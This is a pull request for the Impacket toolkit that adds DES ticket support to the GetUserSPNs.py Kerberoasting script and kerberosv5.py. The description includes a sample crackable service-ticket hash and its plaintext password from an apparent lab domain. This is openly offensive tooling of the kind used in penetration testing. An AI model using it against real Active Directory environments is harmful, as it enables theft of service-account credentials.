### PR TITLE
Support for DES Kerberoast tickets to GetUserSPNs.py

### DIFF
--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -188,6 +188,15 @@ class GetUserSPNs:
                 print entry
             else:
                 fd.write(entry+'\n')
+        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
+            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
+                constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
+            if fd is None:
+                print entry
+            else:
+                fd.write(entry+'\n')
         else:
             logging.error('Skipping %s/%s due to incompatible e-type %d' % (
                 decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -357,6 +357,7 @@ def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey):
                       (
                           int(constants.EncryptionTypes.rc4_hmac.value),
                           int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+                          int(constants.EncryptionTypes.des_cbc_md5.value),
                           int(cipher.enctype)
                        )
                 )


### PR DESCRIPTION
This PR adds support for DES when Kerberoasting in the same way that #329 added support for AES.  Only modifications that needed to be made were to add DES as a supported cipher in the TGS-REQ.  This was the line added to kerberosv5.py.  The other modification was to add to the elif in GetUserSPNs.py to catch the DES encrypted ticket.

You end up with a hash that looks like this(Password:WeakPass1):

$krb5tgs$3$*larry$OMEGACO.LOCAL$MSSQLSvc/dc.omegaco.local*$9b50a357c344f6e64e719f159511df9a$cc36d69fed999888bbff9d2e8991db658c85434b07f24fc97ef0cf207a5cf90ff04f75f0ca9d3aab88593e9fad2946a3a6d8a07c82822d6840665e6d708e31ca6f1e803faf451ca037a75736a9f05623349c2d97f9038c69790aefbaeaf18166236e2fc75c1de0cabb17ec9711d0560876d7b723c6da2e4559c5e7cd10de4ca35ab3e1abbef60fab3cd5c7c2e411c19f1ed14d2e2d5c3791bf9d0c52a26410e50e724fe6daa977bec795e23c0d9824a39ff8648ef69a2af237b957ed48f684fba374ac6f01611e2cf7147af1f9f4a09a280e9bd8d5d3901af63676d08b9e1cdd847a5e1ecdaffa8225c08f9ac53c3e4249f8d81620b4660f5ed3d80e36ab67220fb04d9a4f1db434c716c9aabd50be97a768268eef6e13cdbd40341c2afb6bc1c03394323152ae1e8fed002c6710665468941de33fd3021a6706bdcbec58468cd7cca7873ba8da094b9ba09c16cdc7fdb4cfac20c4d79e8709cfe4c7aaca3c8d87224e4b845a0d104d842a5022598d7088d19a0f3bd275af00ef6fbefaa6cea757458137ec58337e103ed10e65cd65db1236cd4b0bc72e5ddcd5ab0b1b41ce08ac959a925e93b05f6a070e7616665b9b242417f698611c6af346b225473e9e380cd39e1878964fcc8319b1058285ad198a3285eabf5922dc4698467c9bfa3512d3abfe84f5440591f3fb05656af7000b49981b9b24fe9fdf43f1687f1bdc6b71225750f9afcc36fcc9c7c76a33bd9d10fd9071a24dabecd5e260067023d64b9c33dbe6f4d68725ad7bcfe0addff535e4b57ae4d4e41ce20d11ea8526480615342bad44a250e4eba73c0985b7828fdd602995e126534b67c340107704cebc167dcc3747cbc2fd2b87dca3609022d9b4dcf368f9a770f1e93fdadc5cb009f829a976df2cde6af53da9e21f19cd9fe8a8dd917f976a3176512896c57b36da3e7395b348144253c2a0ebcfb0ddae5165ff049d484f80d72708010e4c76c7d5c99485e303c269c32cc5bec211f298b19144875cc05b126a27e6592ab926e57b873ec80e342021fdd6768dd3005faa83a6f8837cc0b803974eab8ba58b75ba6c1ac6d39a4b9516ce87489beeab44551a4cbffdb79bf7e55ded751c8538011c4efc808f64903ee3822733db15f6506772c1769bd1fc217f0121f013276b375e950f63cb4f9a6dc47b0174b942ad4756c52c8ac14b982b044afb0173fd9f6b17cb752b8a8cef49a76687e616ac7f5b34e6901c3d6d7fc885d587030c64c927bec630f9bce04654414b2ac58c74b54e0584df49e664c54142e1d0cd73d2160070023d6b2b4f320faee868d146615f5d8738dc909e7fb195e6169a7bee323686f3ea28068fecf1145ce6daba3c2129a7722f787f92deb2947873a39b613bd7e39e78a3453b091aff2f0b40bdea08f2dcdd5c1c7011e3232d2209c2a576652f4266bd65b40e5c245a520d0ea247d7033c7a95b63da0


Before anyone comes along reading this later and gets too excited about this, based on research me and a colleague did... Even though DES is more than 40 years old, it is still an upgrade from a cracking perspective from RC4(which relies on the NTLM hash).  It is also exceedingly unlikely for you to see an account or accounts configured like this in an environment. 